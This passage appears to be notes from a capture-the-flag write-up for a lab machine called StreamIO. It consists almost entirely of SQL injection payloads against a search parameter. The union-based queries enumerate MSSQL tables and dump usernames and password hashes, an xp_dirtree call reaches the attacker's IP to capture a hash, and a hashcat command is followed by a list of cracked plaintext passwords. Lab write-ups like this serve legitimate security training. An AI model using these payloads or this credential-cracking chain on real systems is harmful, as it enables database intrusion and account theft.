SQL Injection

https://watch.streamio.htb/search.phpwatch.streamio.htb

'and 1=1-- -

Select name, year, URL from movedb where q == 'snatch'

q=%

Select * from movies where name like '%fast%'

Select * from movies where name like '%fast%'-- -%'

q=fast%'-- -

q=fast'union select 1,2,3,4,5,6-- -

q=fast'union select 1,(select @@version),3,4,5,6-- -

q=fast'; exec xp_dirtree '\\10.10.14.6\adot8';-- -

q=fast'union select 1,name,id,4,5,6 from streamio..sysobjects where xtype='u'-- -

q=fast'union select 1,(select string_agg(name, '|') from streamio..syscolumns where id='901578250'),3,4,5,6-- -

q=fast'union select 1,(select string_agg(concat(username,':',password), '|') from users),3,4,5,6-- -

hashcat -m 0 --user dump.hash ~/rockyou.txt --show

Lauren:##123a8j8w5123##
Sabrina:!!sabrina$
Thane:highschoolmusical
Barry:$hadoW
Michelle:!?Love?!123
Victoria:!5psycho8!
Clara:%$clara
Lenord:physics69i
Juliette:$3xybitch
Bruno:$monique$1991$
yoshihide:66boysandgirls..
admin:paddpadd

PreviousExploit Chain NextLoggin into application

Last updated 1 year ago